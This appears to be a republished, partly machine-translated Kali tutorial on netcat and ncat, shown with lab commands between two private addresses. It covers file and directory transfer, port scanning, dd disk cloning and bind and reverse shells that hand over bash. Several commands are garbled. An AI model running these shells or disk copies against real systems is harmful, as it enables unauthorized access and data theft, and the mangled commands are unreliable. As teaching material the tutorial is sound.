Kali penetration test 1-netcat

Source: Internet
Author: User
Tags lua mcrypt ssl certificate

What is Netcat?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is the designed to be a reliable "back-end" tool which can be used directly or easily driven by other programs and scripts. At the same time, it's a Feature-rich network debugging and Exploration tool, since it can create almost any kind of conn Ection you would need and have several interesting built-in capabilities.

The GNU Netcat--Official homepage

Help information:

Nc-h:connect to SOMEWHERE:NC [-options] hostname port[s] [ports] ... listen for inbound:nc-l-P port [-options] [Hostnam E] [port]options:-c shell Commandsas '-e '; Use/bin/sh to exec [dangerous!!] -e Filenameprogram to exec after connect [dangerous!!] -ballow broadcasts-g gatewaysource-routing Hop Point[s], up to 8-g numsource-routing Pointer:4, 8, ...-hthis cruft-i Secsdelay interval for lines sent, ports scanned-        k                      set keepalive option on Socket-llisten mode, for inbound Conne Cts-nnumeric-only IP addresses, no dns-o filehex dump of traffic-p portlocal Port number-rrandomize local and remote ports -Q Secsquit after EOF on stdin and delay of secs-s addrlocal source address-t tosset Type of Service-tanswer TELNET Negoti ATION-UUDP Mode-vverbose [use twice-be + verbose]-w Secstimeout for connects and final net Reads-csend CRLF as line- ENDING-ZZERO-I/O mode [used for scanning]

  

A: Server IP 192.168.192.144

B: Client IP 192.168.192.100

1. Normal port connection

NC-NV 192.168.192.144 #连接A服务武器的80端口

Direct communication:

Server A:nc-l-P 333 #开启并监听333端口

Client B:NC-NV 192.168.192.144 333

2. Transferring text messages

Server A:nc-l-P 333

Client B:ls-l | NC-NV 192.168.192.144 333 #显示A的目录信息

Server A:nc-l-P 333 >message.txt

Client B:ps aux | grep SSH | NC-NV 192.168.192.144 333-q 1 #ssh进程信息传输给A

3. Transferring files

Server A:nc-l-P 333 > From_bclient.mp4 #接受文件端

Client B:NC-NV 192.168.192.144 333 < my.mp4-q 1 #发送文件端

-Q 1: Exit after 1 seconds of transmission end

Server A:nc-l-P 333 < A.mp4-q 1 #发送文件端

Client B:NC-NV 192.168.192.144 333 > From_a.mp4 #接收文件端

4. Transfer Directory

a:tar-cvf-notebooks/| NC-LP 192.168.192.144-q 1

B:NC-NV 192.168.192.144 333 | TAR-XVF-

5. Transferring encrypted files

A:NC-LP 333 | MCrypt--flush-fbqd-a rijndael-256-m ECB > Fromb.mp4

B:mcrypt--flush-fbqd-a rijndael-256-m ECB < My.mp4 | NC-NV 192.168.192.144 333-q 1

6. Streaming Media Services

A:cat A.mp4 | NC LP 333 #流媒体服务端

B:NC-NV 192.168.192.144 333 | MPLAYER-VO X11-cache 3000-

MPlayer: command-mode player

7. Port Scan

Nc-nvz 192.168.190.144 1-1024 #扫描A的1-Port 1024th default scan TCP port

Nc-nvzu 192.168.190.144 1-1024 #扫描UDP端口

8. Remote hard disk/memory clone

A:NC LP 333 | DD OF=/DEV/DSA

B:DD IF=/DEV/SDA | NC-NV 192.168.192.144 333-q 1

9. Remote CONTROL

B Control A

A:NC-LP 333-c Bash

B:NC 192.168.192.144 333

Note:

A's firewall is closed all Port B cannot control a through the connection port, B turns on and listens on port 333, let a active to connect

B Control A

A:NC 192.168.192.100 333-c Bash

B:NC-LP 333

NC lacks encryption and authentication, and the information transmitted directly is addressed in plaintext:ncat

usage:ncat [options] [hostname] [port]options taking a time assume seconds.  Append ' Ms ' for milliseconds, ' s ' for seconds, ' m ' for minutes, or ' H ' for hours (e.g. 500ms). -4 use IPv4 only-6 with IPv6 only-u,--unixsock use Unix do Main sockets Only-c,--crlf use CRLF for EOL sequence-c,--sh-exec <command> executes the GIV En command via/bin/sh-e,--exec <command> executes the given command--lua-exec <filename> exec         Utes the given Lua script-g HOP1[,HOP2,...]   Loose Source routing Hop points (8 max)-G <n> Loose Source Routing Hop pointer (4, 8, 12, ...) -M,--max-conns <n> Maximum <n> simultaneous connections-h,--help Display this hel  P screen-d,--delay <time> Wait between Read/writes-o,--output <filename> Dump session data to  A file-x,--hex-dump <filename>Dump session data as Hex to a file-i,--idle-timeout <time> idle read/write timeout-p,--source-port Port S               Pecify source port to Use-s,--source addr Specify Source address to use (doesn ' t affect-l)-L,--listen  Bind and listen for incoming connections-k,--keep-open Accept multiple connections in listen mode -N,--nodns do not resolve hostnames via dns-t,--telnet Answer telnet negotiations-u,- -UDP use UDP instead of the default TCP--SCTP use SCTP instead of default tcp-v,--ve                         Rbose Set verbosity level (can be used several times)-W,--wait <time> Connect timeout-z  ZERO-I/O mode, report connection status only--append-output append rather than clobber Specified output files--send-only only send data, ignoring received; Quit on EOF--recv-only only receive data,Never send anything--allow allow only given hosts to connect to Ncat--allowfile A fi Le of hosts allowed to connect to NCAT--deny deny given hosts from connecting to Ncat--denyfil e A file of the hosts denied from connecting to Ncat--broker Enable ncat ' s connection brokerin G Mode--chat Start a simple ncat chat server--proxy <addr[:p ort]> specify address of HO St to proxy through--proxy-type <type> specify proxy type ("http" or "SOCKS4" or "SOCKS5")--proxy-aut      H <auth> authenticate with HTTP or SOCKS proxy server--ssl Connect or listen with SSL --ssl-cert Specify SSL certificate file (PEM) for listening--ssl-key specify SSL private K        EY (PEM) for listening--ssl-verify Verify trust and domain name of certificates--ssl-trustfile PEM file containing TRUsted SSL Certificates--ssl-ciphers cipherlist containing SSL ciphers to use--SSL-ALPN AL      PN protocol list to use.  --version Display ncat ' s version information and exit

A:

Ncat-c Bash--allow 192.168.192.100-vnl 333--ssl #允许192.168.192.100 Connect SSL Encryption

B:

NCAT-NV 192.168.192.144 333--ssl

A:

B:

Reprint please indicate the source.

Posted on 2018-04-23

Kali penetration test 1-netcat

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.